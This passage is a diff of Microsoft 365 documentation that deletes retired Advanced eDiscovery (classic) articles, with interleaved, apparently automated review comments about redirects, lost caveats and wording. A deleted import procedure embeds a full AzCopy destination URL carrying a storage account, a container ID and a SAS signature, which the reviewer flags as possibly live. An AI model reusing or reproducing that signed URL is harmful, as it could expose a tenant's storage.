-|Tagged_By <br/> |Relevance <br/> |User who tagged the file in Relevance for the specific issue. <br/> |No <br/> |Yes <br/> |
-|Word_count <br/> |Analyze <br/> |Number of words in the document. <br/> |No <br/> |Yes <br/> |
-|
-
-## Related Topics
-
-[Advanced eDiscovery (classic)](office-365-advanced-ediscovery.md)
-
-[Exporting case data with Advanced eDiscovery](export-case-data-in-advanced-ediscovery.md)
-
-[Exporting results](export-results-in-advanced-ediscovery.md)
-
-[Viewing batch history and exporting past results](view-batch-history-and-export-past-results.md)
-
-
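Review bot: Deleting this field table removes the reference for coded columns in load files that customers have already exported, for example the `Inclusive_type` values (0 - not inclusive, 1 - Inclusive, 2 - Inclusive minus, 3 - Inclusive copy) and `Has_Text` (0 - no; 1 - yes). The retirement notice in office-365-advanced-ediscovery.md tells customers to archive case data by exporting it, so those archives will outlive this page. Consider keeping the table in an archived location or folding it into the retirement article, and check that the deleted URL redirects somewhere useful.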
compliance https://docs.microsoft.com/en-us/microsoft-365/compliance/export-results-in-advanced-ediscovery https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/export-results-in-advanced-ediscovery.md deleted file mode 100644
@@ -1,198 +0,0 @@
-title: "Export results in Advanced eDiscovery"
-f1.keywords:
-- NOCSH
-ms.author: markjjo
-author: markjjo
-manager: laurawi
-titleSuffix: Office 365
-audience: Admin
-ms.topic: article
-ms.service: O365-seccomp
-localization_priority: Normal
-search.appverid:
-- MOE150-- MET150
-ms.assetid: a9951a07-10b3-48cb-b37a-0ffaa24931ad
-description: "Learn how to define options for exporting results from Advanced eDiscovery, including the procedure for specifying parameters for an export batch. "
-
-# Export results in Advanced eDiscovery (classic)
-
-> [!NOTE]
-> Advanced eDiscovery requires an Office 365 E3 with the Advanced Compliance add-on or an E5 subscription for your organization. If you don't have that plan and want to try Advanced eDiscovery, you can [sign up for a trial of Office 365 Enterprise E5](https://go.microsoft.com/fwlink/p/?LinkID=698279).
-
-This topic describes the Advanced eDiscovery Export Setup options.
-
- **In this topic:**
-
-- [Defining export batches and sessions](export-results-in-advanced-ediscovery.md#BK_Define)
-
-- [Incremental and additional exports](export-results-in-advanced-ediscovery.md#BK_IncrementalReports)
-
-- [Set up batch export parameters](export-results-in-advanced-ediscovery.md#BK_SetUpExport)
-
-- [Export report output files](export-results-in-advanced-ediscovery.md#BK_ExportOutputFIles)
-
-## Defining export batches and sessions
-<a name="BK_Define"> </a>
-
-An export batch allows export processing using a set of defined parameters. Advanced eDiscovery enables you to define batches to customize each export.
-
-Parameters are defined per export batch. A batch named "Export batch 01" is created by default for the first batch of a case. You can also edit the batch name and description.
-
-An export session is an execution of Advanced eDiscovery Export within an export batch.
-
-## Incremental and additional exports
-<a name="BK_IncrementalReports"> </a>
-
-You can run multiple export sessions within an export batch, to ensure consistent results based on the same export template and parameters. For each session within a batch, you can export analytics for newly processed case data and process each "incrementally."
-
-In order to export using a different set of parameters, you first need to create a new batch. The first session in the new batch will produce results for files processed in the case so far, whether or not these files were imported and processed over one or multiple Imports. Each batch recalculates pivots, similarity, inclusives, etc. Sessions use the parameters defined for the batch and do not recalculate pivots, similarity, inclusives, etc. for each session execution.
-
-For example, assume a case was imported and its data analyzed. In order to retrieve Near-duplicates and Email Threading results for the incremental data, click **Create export session** in the same batch that was previously used to export data.
-
-## Set up batch export parameters
-<a name="BK_SetUpExport"> </a>
-
-The eDiscovery Export Tool is used to export search results from Advanced eDiscovery to your local computer.
-
-1. In Advanced eDiscovery, select a Case and click **Export** \> **Setup**.
-
- - From the **Export batch** list, select the batch name or export results to Export batch 01, (the default batch).
-
- - To export results for new files that you added to an existing case, continue with your current batch. To create a session in the batch, select the same batch number and click **Create export session** You can use this option to export the same parameters as the previous batch, in an incremental manner.
-
- - To export to a new batch, click **Add** ![add icon](../media/c2dd8b3a-5a22-412c-a7fa-143f5b2b5612.png)and enter a new name in **Batch name** (or accept the default) and a description in **Batch description**. Click **OK**.
-
- - To edit a batch name or description, select the name in **Export batch**, click **Edit** ![Edit icon](../media/3d613660-7602-4df2-bdb9-14e9ca2f9cf2.png), and then modify the fields.
-
- > [!NOTE]
- > After you've run sessions for an export batch, they cannot be deleted. In addition, only some parameters can be edited once the first session is run.
-
- - To create a duplicate export batch, choose **Duplicate export batch** ![Create a duplicate export batch icon](../media/3f6d5f59-e842-4946-a493-473528af0119.jpg) and enter a name and a description for the duplicate batch in the panel.
-
- - To delete an export batch, choose **Delete** ![Delete an export batch icon](../media/92a9f8e0-d469-48da-addb-69365e7ffb6f.jpg).
-
- - To view the history of a batch, choose **Batch history** ![View history icon](../media/a80cc320-d96c-4d91-8884-75fe2cb147e2.jpg).
-
-2. Under **Population**, select **Include only files above Relevance cut-off score** and/or **Refine export batch** if you want to fine-tune the settings for your export batch.
-
-3. If you select **Include only files above Relevance cut-off score**, then the **Issue** is enabled. If the file's relevance score is higher than the cut-off score for the selected issue, the file will be exported unless it's excluded by the 'For review' filter.
-
- If you select **Refine export batch**, the **De-dupe** and Filter by 'For review' field radio buttons are enabled. If you choose **De-dupe**, then duplicate files will be filtered out according to the policy defined [Case level (default): from every set of duplicate files in the entire case, all but one file will be de-duped. Custodian level: from every set of duplicate files of the same custodian, all but one file will be de-duped.] The export output contains a record of all duplicate files. If you choose **Filter by 'For review'** field, select **Modify under Metadata** to enter your **'For review'** field settings. Select **Include input files** to include source files in the package content. You can clear this setting to speed up the export process. Note that the Native files will be exported in any case.
-
-4. Under **Metadata**, select from the following options in the **Export template** list (once per session).
-
- - **Standard**: Basic set of data items, metadata, and properties. Use this option when import data was already processed in Advanced eDiscovery and export data is uploaded to a system that already contains the files. By default, export template columns are created and filled.
-
- - **All**: Full set of standard metadata including all processing data, as well as Analyze and Relevance scores. This template is required when Advanced eDiscovery performs the processing and file data is uploaded to an external system for the first time.
-
- - **Issues**: Select **All Issues** or select a particular issue you have created.
-
-5. Under **Destination**:
-
- - **Download to local machine**
-
- - **Export to user-defined Azure blob**: If this is checked, you can specify a container URL and SAS token.
-
- > [!NOTE]
- > Once an export package is stored to the user defined Azure blob, the data is no longer managed by Advanced eDiscovery; it's managed by the Azure blob. This means if you delete the case, the exported files will still remain on the Azure blob.
-
- - **Save SAS token for future export session**: If checked, the SAS token will be encrypted in the Advanced eDiscovery's internal database for future use.
-
- > [!NOTE]
- > Currently the SAS token expires after a month. If you try to download after more than a month you have to undo last session, then export again.
-
-6. Click **Modify** to set the 'for review' field settings.
-
- ![Set up For review field settings for an export batch](../media/39451aba-f6fe-4a01-8ed0-0be6a6ce889a.png)
-
- - Under **For review field settings**, in **Select scenario** pull-down list, select the scenario and scope of the review. The settings are displayed based on your selection.
-
- - **Review all** (default): All emails, attachments, and documents are selected by default.
-
- - **Review all unique content in a set**: Inclusives and unique inclusive copies, unique attachments in email set level, representative from every set of exact duplicates.
-
- - **Review all unique content in a set - no inclusive copies**: Inclusives, unique attachments in email set level, representative from every set of exact duplicates.
-
- - **Review all unique content and related family files**: Inclusives, unique attachments in email set level, representative from every set of exact duplicates, expand to include family files.
-
- - **Custom** (allows you to define the options in the dialog): The default is to keep current selections and enable all dialog options, to allow their selection. If you select this option, you can then customize the settings for emails, documents, attachments and miscellaneous.
-
- - Under **Emails**, select the emails you want to export.
-
- - **All emails**: (default) All emails are selected.
-
- - **Inclusives**: An inclusive email is a last email of a thread, and it contains all the other emails from the thread.
-
- - **Inclusives and unique inclusive copies**: Inclusive copies and inclusives with the same subject, body and attachments; unique inclusive copies are unique copies of these emails .
-
- - Under **Documents**, select the documents you want to export.
-
- - **All documents**: (default) All documents are selected.
-
- - **Pivots**: A file chosen as representative of near-duplicates set, which is typically used as the baseline when reviewing the set.
-
- - **Representative from every set of exact duplicates**: Unique near-duplicate files (including the pivot).
-
- - Under **Attachments**, select the attachments you want to export.
-
- - **All attachments**: (default) All attachments are selected.
-
- - **Unique attachment in case level**: Unique attachment files within the specified case.
-
- - **Unique attachment in email set level**: Unique attachment files within the specified email case.
-
- - Under**Micellaneous**, you can choose to **Treat attachments as documents**, **Treat emails as documents**, or **Expand to include family files**. When you choose **Expand to include family files**, for each file that is flagged for review, all files of the same family will also be flagged.
-
-7. Choose **Save** to save the settings.
-
-8. After you specify export parameters, to start export batch, click **Create export session**.
-
- During export, the status is displayed in **Task status**. The results are displayed in **Export summary**.
-
-9. In the **Download files** window, click **Copy to clipboard** to copy the Export key.
-
- ![Download files](../media/99cf2c13-4954-479f-9741-80d7458c1a15.png)
-
-10. Click **Close**.
-
- The eDiscovery Export Tool is started.
-
- ![eDiscovery export tool](../media/705756ca-ee97-4d24-b70f-8b23513f6d11.gif)
-
-11. In the **eDiscovery Export Tool**:
-
- - In **Paste the Shared Access Signature that will be used to connect to the source**, paste the Export key that you copied to the clipboard in step 7.
-
- - Click **Browse** to select the target location for storing the downloaded export files on the local machine.
-
- - Click **Start**.The export files are downloaded to the local machine. If you chose **Export to user-defined Azure blob** in step 4, the session is exported to a Blob storage URL destination of your choosing.
-
-For a full description of the fields in the export report, see [Export report fields](export-report-fields-in-advanced-ediscovery.md).
-
-## Export report output files
-<a name="BK_ExportOutputFIles"> </a>
-
-The following table lists the output files that are generated when you run an Export batch.
-
-|**File name**|**File type**|**Description**|
-|:-----|:-----|:-----|
-|Export summary <br/> |csv <br/> |A log file generated by the eDiscovery Export Tool. <br/> |
-|Trace <br/> |txt <br/> |A log file generated by the eDiscovery Export Tool. <br/> |
-|Extracted text files <br/> |File folder <br/> |Folder that contains the extracted text files of the exported files. <br/> |
-|Input or native files <br/> |File folder <br/> |Folder that contains the native and input files of the exported files. <br/> |
-|Export list <br/> |xlsx <br/> |Exported files metadata in xlsx format. Fields in files are according to template user selects to export. If needed, several files are created, each contains 100-150K rows. If a certain value contains more characters than an Excel cell can contain (currently the limit is 32,767 characters), then the value will be trimmed to the maximum length allowed. If a value is trimmed, the cell's background color is red to indicate this to the user."Email participants" is an example of a field that can exceed the length limit, if the email was sent to a large distribution. See [Export report fields](export-report-fields-in-advanced-ediscovery.md) for details about the output fields. <br/> |
-|Load file <br/> |csv <br/> |Exported files metadata in csv format for loading into a different application. Fields in files are according to template user selects to export. <br/> |
-|Success indicator <br/> |txt <br/> |Only created when exporting to a 3rd party Azure blob. If export succeed completely, the file will be created. In case of failure, or partial success the file will not be created. File will be created in the root folder, allowing automated tracking on different Export batches/sessions statuses. This is an empty file. Its name is: TenantId_CaseId_ExternalCaseId_CaseName_ExportBatchId_SessionId_DateTime.txt. <br/> |
-
-## See also
-
-[Advanced eDiscovery (classic)](office-365-advanced-ediscovery.md)
-
-[Viewing batch history and exporting past results](view-batch-history-and-export-past-results.md)
-
-[Quick setup for Advanced eDiscovery](quick-setup-for-advanced-ediscovery.md)
-
-[Export report fields](export-report-fields-in-advanced-ediscovery.md)
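Review bot: The two notes under step 5 (Destination) carry operational facts that are lost with this deletion: an export package written to a user-defined Azure blob is no longer managed by Advanced eDiscovery and remains on the blob after the case is deleted, and the saved SAS token expires after a month. Anyone who exported to their own blob before retirement still holds that data and owns its retention and access control, so suggest carrying both caveats into whichever article replaces this page. The retirement notice in office-365-advanced-ediscovery.md also points readers at this page's URL for archiving instructions, so check that the URL redirects.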
compliance https://docs.microsoft.com/en-us/microsoft-365/compliance/import-non-office-365-data-into-advanced-ediscovery https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/import-non-office-365-data-into-advanced-ediscovery.md deleted file mode 100644
@@ -1,85 +0,0 @@
-title: "Import non-Microsoft 365 content for Advanced eDiscovery analysis"
-f1.keywords:
-- NOCSH
-ms.author: markjjo
-author: markjjo
-manager: laurawi
-titleSuffix: Office 365
-audience: ITPro
-ms.topic: article
-ms.service: O365-seccomp
-localization_priority: Normal
-search.appverid:
-- OEC150-- MET150
-ms.assetid: 0ee60763-a30b-495b-8543-971c3384a801
-description: "How to steps to import content that is not stored in Microsoft 365 into an Azure blob so that it can be analyzed with AeD"
-ms.custom: seo-marvel-apr2020
-
-# Import non-Microsoft 365 content for Advanced eDiscovery (classic) analysis
-
-Not all documents that you may need to analyze with Advanced eDiscovery will live in Microsoft 365. With the Non-Microsoft 365 content import feature in Advanced eDiscovery you can upload documents that don't live in Microsoft 365 (except PST files) into a case linked, Azure storage blob and analyze them with Advanced eDiscovery. This procedure shows you how to bring your non-Microsoft 365 documents into Advanced eDiscovery for analysis.
-
-> [!NOTE]
-> Advanced eDiscovery requires an Office 365 E3 with the Advanced Compliance add-on or an E5 subscription for your organization. If you don't have that plan and want to try Advanced eDiscovery, you can [sign up for a trial of Office 365 Enterprise E5](https://go.microsoft.com/fwlink/p/?LinkID=698279).
-
-> [!NOTE]
-> You can purchase an Advanced eDiscovery data storage add-on subscription for your non-Microsoft 365 content. This is exclusively available for content that is to be analyzed with Advanced eDiscovery. Follow the steps in [Buy or edit an add-on for Microsoft 365 for business](https://docs.microsoft.com/microsoft-365/commerce/buy-or-edit-an-add-on) and purchase the Advanced eDiscovery storage add-on.
-
-## Requirements to upload non-Office 365 content
-
-Using the upload Non-Office 365 feature as described in this procedure requires that you have:
-
-- An Office 365 E3 with Advanced Compliance add-on or E5 subscription.
-
-- All custodians whose non-Office 365 content will be uploaded must have E3 with Advanced Compliance add-on or E5 licenses.
-
-- An existing eDiscovery case.
-
-- All the files for uploading gathered into folders where there is one folder per custodian and the folders' name is in this format *alias@domainname* . The *alias@domainname* must be users Office 365 alias and domain. You can collect all the *alias@domainname* folders into a root folder. The root folder can only contain the *alias@domainname* folders, there must be no loose files in the root folder.
-
-- An account that is either an eDiscovery Manager or eDiscovery Administrator.
-
-- [Microsoft Azure Storage Tools](https://aka.ms/downloadazcopy) installed on a computer that has access to the non-Office 365 content folder structure.
-
-## Upload non-Office 365 content into Advanced eDiscovery
--
-1. As an eDiscovery Manager or eDiscovery Administrator, open **eDiscovery**, and open the case that the non-Office 365 data will be uploaded to. If you need to create a case, see [Manage eDiscovery cases in the Security &amp; Compliance Center](ediscovery-cases.md).
-
-2. Click **Switch to Advanced eDiscovery**.
-
-3. Select **Review Sets** from the menu.
-
-4. Select an existing Review Set or choose **Add Review Set**.
-
-5. Select **Manage review set**.
-
-6. In the Non-Office 365 data card, select **View Uploads**.
-
-7. Choose **Upload files** to start the file upload wizard.
-
-8. The first tab is **1. Prepare step**. Select **Next: Upload files**.
-
-9. On the **2. Upload files** tab you will be prompted to download AzCopy.exe if you have not done so already, and then to provide the path to the file location. For example, `C:\Upload` will give you the command to execute AzCopy.exe. Using `C:\Upload`, you will see:
-
- `"%ProgramFiles(x86)%\Microsoft SDKs\Azure\AzCopy\AzCopy.exe" /Source:"c:\upload" /Dest:"https://spnam03salinkexternal003.blob.core.windows.net/16d13440-a6a4-4bc5-a82b-10ac9cfe9d7c-1601401811-externalstore?sv=2017-07-29&sr=c&si=ExternalStore63%7C0&sig=9Dq5v20TwkxByYDHhIEx%2FHSLlmlqUjY0njkJyTO0zGA%3D" /s`
-
-10. Open a command prompt window and execute the AzCopy.exe command to import the data into Azure. Once it has loaded all of the data, select **Next: Process files**.
-
-11. The next tab is **3. Process files** where you will see the custodians that have data associated with them and will also show you the progress of the data being imported.
-
- For more information on Azcopy syntax, see [Transfer data with the AzCopy on Windows](https://docs.microsoft.com/azure/storage/common/storage-use-azcopy).
-
- For more details on Advanced eDiscovery Processing, see [Run the Process module and load data in Advanced eDiscovery (classic)](run-the-process-module-and-load-data-in-advanced-ediscovery.md).
-
- > [!IMPORTANT]
- > There must be one root folder per user and the folder name must be in the <b>alias@domainname</b> format.
-
- > [!IMPORTANT]
- > Once the container is successfully processed in Advanced eDiscovery, you will no longer be able to add new content to the SAS storage in Azure. If you collect additional content and you want to add it to the case for Advanced eDiscovery analysis, you must create a new **Non-Office 365 data** container and repeat this procedure.
-
- > [!NOTE]
- > If the container *does not process successfully due to folder naming issues* and you then fix the issues, you will still have to create a new container and the reconnect and upload again using the procedures in this article.
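Review bot: Step 9 of the removed procedure embeds a complete AzCopy `/Dest:` URL with a storage account name, a container GUID and a `sig=` value in its SAS query string, and deleting the file does not remove that string from the repository history or from cached copies of the page. If that URL was ever issued for a real tenant rather than made up for the docs, confirm that the stored access policy it references (`si=ExternalStore63%7C0`) or the signing key has been revoked. Any replacement article should show the command with placeholders for the account, container and signature.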
compliance https://docs.microsoft.com/en-us/microsoft-365/compliance/manage-relevance-setup-in-advanced-ediscovery https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/manage-relevance-setup-in-advanced-ediscovery.md
@@ -14,6 +14,7 @@ search.appverid:
- MOE150 - MET150 ms.assetid: fd6be6d3-2e8d-449d-9851-03ab7546e6aa
+ROBOTS: NOINDEX, NOFOLLOW
description: "Read the recommendations for setting up Relevance training in Advanced eDiscovery to score files by their relevance and generate analytical results." ---
@@ -64,15 +65,4 @@ The parameters described in this section are available in the Advanced eDiscover
- Define and organize issues carefully, as this can impact the Relevance training results.
-After parameters are set, the reviewer / expert can start training the files in the **Relevance** tab.
-
-## See also
-
-[Advanced eDiscovery (classic)](office-365-advanced-ediscovery.md)
-
-[Defining issues and assigning users](define-issues-and-assign-users.md)
-
-[Setting up loads to add imported files](set-up-loads-to-add-imported-files.md)
-
-[Defining highlighted keywords and advanced options](define-highlighted-keywords-and-advanced-options.md)
-
+After parameters are set, the reviewer / expert can start training the files in the **Relevance** tab.
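Review bot: The removed See also block drops links to define-issues-and-assign-users.md, set-up-loads-to-add-imported-files.md and define-highlighted-keywords-and-advanced-options.md as well as the overview article, but only the overview is shown as deleted here. Confirm the other three are removed or redirected in the same change, so that this retained page is not the last reference to orphaned articles. The closing sentence is removed and re-added with identical text, which looks like an end-of-file newline change only; worth checking the file still ends with a newline.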
compliance https://docs.microsoft.com/en-us/microsoft-365/compliance/office-365-advanced-ediscovery https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/office-365-advanced-ediscovery.md deleted file mode 100644
@@ -1,115 +0,0 @@
-title: "Advanced eDiscovery"
-f1.keywords:
-- NOCSH
-ms.author: markjjo
-author: markjjo
-manager: laurawi
-titleSuffix: Office 365
-audience: Admin
-ms.topic: overview
-ms.service: O365-seccomp
-localization_priority: Normal
-search.appverid:
-- MOE150-- MET150
-ms.assetid: fd53438a-a760-45f6-9df4-861b50161ae4
-description: "Learn how Advanced eDiscovery can help you analyze data, streamline document reviews, and make decisions for efficient eDiscovery."
-
-# Advanced eDiscovery (classic)
-
-> [!IMPORTANT]
-> **Advanced eDiscovery (classic) will be permanently retired on December 31, 2020.**<br/>
-> As we continue to invest in newer versions of Advanced eDiscovery, we're announcing the permanent retirement and removal of cases and case data from Advanced eDiscovery (classic).
-> If you're still using Advanced eDiscovery (classic), also known as *Advanced eDiscovery v1.0*, please transition your usage to [Advanced eDiscovery v2.0](overview-ediscovery-20.md) (also known as the *Advanced eDiscovery solution in Microsoft 365*) as soon as possible. In preparation for the removal of all cases and case data, you can archive case data by [exporting data from a case](https://docs.microsoft.com/microsoft-365/compliance/export-results-in-advanced-ediscovery?view=o365-worldwide).
-> Advanced eDiscovery v2.0 contains similar functionality found in Advanced eDiscovery v1.0, but also offers many new features such as custodian management, communications management, and review sets. To learn more about the previous retirment phases of Advanced eDiscovery v1.0, see [Retirement of legacy eDiscovery tools](legacy-ediscovery-retirement.md#advanced-ediscovery-v10).
-
-With Advanced eDiscovery, you can better understand your data and reduce your eDiscovery costs. Advanced eDiscovery helps you analyze unstructured data, perform more efficient document review, and make decisions to reduce data for eDiscovery. You can work with data stored in Exchange Online, SharePoint Online, OneDrive for Business, Skype for Business, Microsoft 365 Groups, and Microsoft Teams. You can perform an eDiscovery search in the security and compliance center to search for content in groups, individual mailboxes and sites, and then analyze the search results with Advanced eDiscovery. When you prepare search results for analysis in Advanced eDiscovery, Optical Character Recognition enables the extraction of text from images. This feature allows the powerful text analytic capabilities of Advanced eDiscovery to be applied to image files.
-
-Advanced eDiscovery streamlines and speeds up the document review process by identifying redundant information with features like Near-duplicates detection and Email Thread analysis. The Relevance feature applies predictive coding technology to identify relevant documents. Advanced eDiscovery learns from your tagging decisions on sample documents and applies statistical and self-learning techniques to calculate the relevance of each document in the data set. This enables you to focus on key documents, make quick yet informed decisions on case strategy, cull data, and prioritize review.
-
- **Why advanced eDiscovery?** Advanced eDiscovery builds on the existing set of eDiscovery capabilities in Office 365. For example, you can use the Search feature in the Security &amp; Compliance Center to perform an initial search of all the content sources in your organization to identify and collect the data that may be relevant to a specific legal case. Then you can perform analysis on that data by applying the text analytics, machine learning, and the Relevance/predictive coding capabilities of Advanced eDiscovery. This can help your organization quickly process thousands of email messages, documents, and other kinds of data to find those items that are most likely relevant to a specific
-
-> [!NOTE]
-> Advanced eDiscovery requires an Office 365 E3 with the Advanced Compliance add-on or an E5 subscription for your organization. If you don't have that plan and want to try Advanced eDiscovery, you can [sign up for a trial of Office 365 Enterprise E5](https://go.microsoft.com/fwlink/p/?LinkID=698279). case. The reduced data set can then be exported out of Office 365 for further review.
-
-## Get started
-
-The quickest way to get started with Advanced eDiscovery is to create a case and prepare search results in Security & Compliance Center, load those results in Advanced eDiscovery, and then run Express analysis to analyze that case data and then export the results for external review.
-
-- [Get a quick overview](quick-setup-for-advanced-ediscovery.md) of the Advanced eDiscovery workflow
-
-- [Set up users and cases](set-up-users-and-cases-in-advanced-ediscovery.md) for Advanced eDiscovery by creating a case, assigning eDiscovery permissions, and adding case members, all by using the Security & Compliance Center
-
-- [Prepare and load search data](prepare-data-for-advanced-ediscovery.md) in to the case in Advanced eDiscovery
-
-- [Load non-Office 365 data](import-non-office-365-data-into-advanced-ediscovery.md) in to a case to analyze it in Advanced eDiscovery
-
-- [Use Express analysis](use-express-analysis-in-advanced-ediscovery.md) to quickly analyze the data in a case and then easily export the results
-
-## Analyze data
-
-After search data is loaded into the case in Advanced eDiscovery, you'll use the Analyze module to start analyzing it. The first part of the analysis process consists of organizing files into groups of unique files, duplicates, and near-duplicates (also know as document similarity). Then you organize the data again into hierarchically structured groups of email threads and themes and, optionally, set ignore text filters to exclude certain text from analysis. Then you run the analysis and view the results.
-
-- [Learn about document similarity](understand-document-similarity-in-advanced-ediscovery.md) to prepare you for analyzing data in Advanced eDiscovery
-
-- [Set up the options](set-analyze-options-in-advanced-ediscovery.md) for near-duplicates, themes, and email threading and then run the Analyze module
-
-- [Set up Ignore Text filters](set-ignore-text-in-advanced-ediscovery.md) to exclude text and text strings from being analyzed; these filters will also ignore text when you run Relevance analysis
-
-- [View the results](view-analyze-results-in-advanced-ediscovery.md) of the analysis process
-
-- [Configure advanced settings](set-analyze-advanced-settings-in-advanced-ediscovery.md) for the analysis process
-
-## Set up Relevance training
-
-Predictive coding (called Relevance) in Advanced eDiscovery lets you train the system on what you're looking for by letting you to make decisions (about whether something is relevant or not) on a small set of documents.
-
-- [Learn about setting up Relevance training](manage-relevance-setup-in-advanced-ediscovery.md) , tagging files that are relevant to a case, and defining case issues
-
-- [Define case issues](define-issues-and-assign-users.md) and assign each issue to a user who will train the files
-
-- [Add imported files to current or new load](set-up-loads-to-add-imported-files.md) that will be added to the Relevance training. A load is a new batch of files that are added to a case and then used for Relevance training
-
-- [Define highlighted keywords](define-highlighted-keywords-and-advanced-options.md) that can be added to the Relevance training. This helps you better identify files that are relevant to a case
-
-## Run the Relevance module
-
-After set up training, you're ready to run the Relevance module and assess the effectiveness of the training settings. This results in a relevance ranking that helps you decide if you need to perform additional training or if you're ready to start tagging files as relevant to your case.
-
-- [Learn about the Relevance process](use-relevance-in-advanced-ediscovery.md) and the iterative process of assessment, tagging, tracking, and retraining based on sample set of files
-
-- [Learn about assessment](assessment-in-relevance-in-advanced-ediscovery.md) , where an expert familiar with the case reviews a set of case files and determines the effectiveness of the Relevance training
-
-- [Assess case files](tagging-and-assessment-in-advanced-ediscovery.md) to calculate the effectiveness (called *richness) of training settings, and then tag files as relevant or not relevant to your case. This helps you determine if the current training is sufficient or if you should adjust the training settings.
-
-- [Perform the relevance training](tagging-and-relevance-training-in-advanced-ediscovery.md) after assessment is complete, and then once again tag files as relevant or not relevant to the issues you've defined for the case
-
-- [Track the Relevance analysis](track-relevance-analysis-in-advanced-ediscovery.md) process to determine if Relevance training has achieved your assessment target (known as a *stable training status) or whether more training is needed; you can also view the Relevance results for each case issue
-
-- [Make decisions based on Relevance analysis](decision-based-on-the-results-in-advanced-ediscovery.md) to determine the size of the resulting set of case files that can be exported for review
-
-- [Test the quality of the Relevance analysis](test-relevance-analysis-in-advanced-ediscovery.md) to validate the culling decisions made during the Relevance process
-
-## Export results
-
-The final step in analyzing case data in Advanced eDiscovery is to export results of the analysis for external review.
-
-- [Learn about exporting case data](export-case-data-in-advanced-ediscovery.md)
-
-- [Export case data](export-results-in-advanced-ediscovery.md)
-
-- [View batch history and export past results](view-batch-history-and-export-past-results.md)
-
-- [Export report fields](export-report-fields-in-advanced-ediscovery.md)
-
-## Other Advanced eDiscovery tools
-
-Advanced eDiscovery provides additional tools and capabilities beyond analyzing case data, relevance analysis, and exporting data.
-
-- [Run Advanced eDiscovery reports](run-reports-in-advanced-ediscovery.md)
-
-- [Define case and tenant settings](define-case-and-tenant-settings-in-advanced-ediscovery.md)
-
-- [Advanced eDiscovery utilities](use-advanced-ediscovery-utilities.md)
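Review bot: this overview is deleted outright, with no sign in the hunk of where its published URL should now lead. Add a redirect to overview-ediscovery-20.md, which the removed retirement notice at the top of the file names as the replacement. The file is also the index for many other classic topics (for example use-express-analysis-in-advanced-ediscovery.md and run-reports-in-advanced-ediscovery.md) that are not shown as deleted in this part of the update, so check that none of them stays published with this page as its only entry point.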
compliance https://docs.microsoft.com/en-us/microsoft-365/compliance/office-365-service-encryption https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/office-365-service-encryption.md
@@ -21,20 +21,20 @@ description: "Summary: Understand data resiliency in Microsoft Office 365."
In addition to using volume-level encryption, Exchange Online, Skype for Business, SharePoint Online, and OneDrive for Business also use Service Encryption to encrypt customer data. Service Encryption allows for two key management options: ## Microsoft managed keys
-Microsoft manages all cryptographic keys including the root keys for service encryption. This option is currently available in SharePoint Online and OneDrive for Business. This option is currently being rolled out for Exchange Online. Microsoft managed keys provide default service encryption unless you decide to onboard using Customer Key. If, at a later date, you decide to stop using Customer Key without following the data purge path, then your data stays encrypted using the Microsoft managed keys. Your data is always encrypted at this default level at a minimum.
+Microsoft manages all cryptographic keys including the root keys for service encryption. This option is currently enabled by default for Exchange Online, SharePoint Online, OneDrive for Business. Microsoft managed keys provide default service encryption unless you decide to onboard using Customer Key. If, at a later date, you decide to stop using Customer Key without following the data purge path, then your data stays encrypted using the Microsoft managed keys. Your data is always encrypted at this default level at a minimum.
## Customer Key You supply root keys used with service encryption and you manage these keys using Azure Key Vault. Microsoft manages all other keys. This option is called Customer Key, and it is currently available for Exchange Online, SharePoint Online, and OneDrive for Business. (Previously referred to as Advanced Encryption with BYOK. See [Enhancing transparency and control for Office 365 customers](https://blogs.office.com/2015/04/21/enhancing-transparency-and-control-for-office-365-customers/) for the original announcement.)
-Service encryption provides multiple benefits. For example, Customer Key:
+Service encryption provides multiple benefits:
-- Provides rights protection and management features on top of strong encryption protection.
+- Provides an added layer of protection on top of bitlocker.
-- Includes a Customer Key option that enables multi-tenant services to provide per-tenant key management.
+- Provides separation of Windows operating system administrators from access to application data stored or processed by the operating system.
-- Provides separation of Windows operating system administrators from access to customer data stored or processed by the operating system.
+- Includes a Customer Key option that enables multi-tenant services to provide per-tenant key management.
-- Enhances the ability of Microsoft 365 to meet the demands of customers that have compliance requirements regarding encryption.
+- Enhances the ability of Microsoft 365 to meet the demands of customers that have specific compliance requirements regarding encryption.
Using Customer Key, you can generate your own cryptographic keys using either an on-premises Hardware Service Module (HSM) or Azure Key Vault (AKV). Regardless of how you generate the key, you use AKV to control and manage the cryptographic keys used by Office 365. Once your keys are stored in AKV, they can be used as the root of one of the keychains that encrypts your mailbox data or files.
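Review bot: in the added bullet "Provides an added layer of protection on top of bitlocker." the product name should be written BitLocker, and the added sentence "enabled by default for Exchange Online, SharePoint Online, OneDrive for Business" needs "and" before the last item. The unchanged context line at the end of the hunk expands HSM as "Hardware Service Module"; the term is Hardware Security Module and is worth correcting while this section is open. The change also drops the earlier bullet about rights protection and management features without a replacement; if that is intentional, note the reason in the commit message.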
compliance https://docs.microsoft.com/en-us/microsoft-365/compliance/prepare-data-for-advanced-ediscovery https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/prepare-data-for-advanced-ediscovery.md deleted file mode 100644
@@ -1,76 +0,0 @@
-title: "Prepare data for Advanced eDiscovery"
-f1.keywords:
-- NOCSH
-ms.author: markjjo
-author: markjjo
-manager: laurawi
-titleSuffix: Office 365
-ms.date: 9/14/2017
-audience: Admin
-ms.topic: article
-ms.service: O365-seccomp
-localization_priority: Normal
-search.appverid:
-- MOE150-- MET150
-ms.assetid: 2fb94c23-1846-4a0e-994d-da6d02445f15
-description: "Learn how to use the Security &amp; Compliance Center to prepare data for analysis with Advanced eDiscovery."
-
-# Prepare data for Advanced eDiscovery (classic)
-
-This topic describes how to load the results of a Content Search in to a case in Advanced eDiscovery (classic).
-
-> [!IMPORTANT]
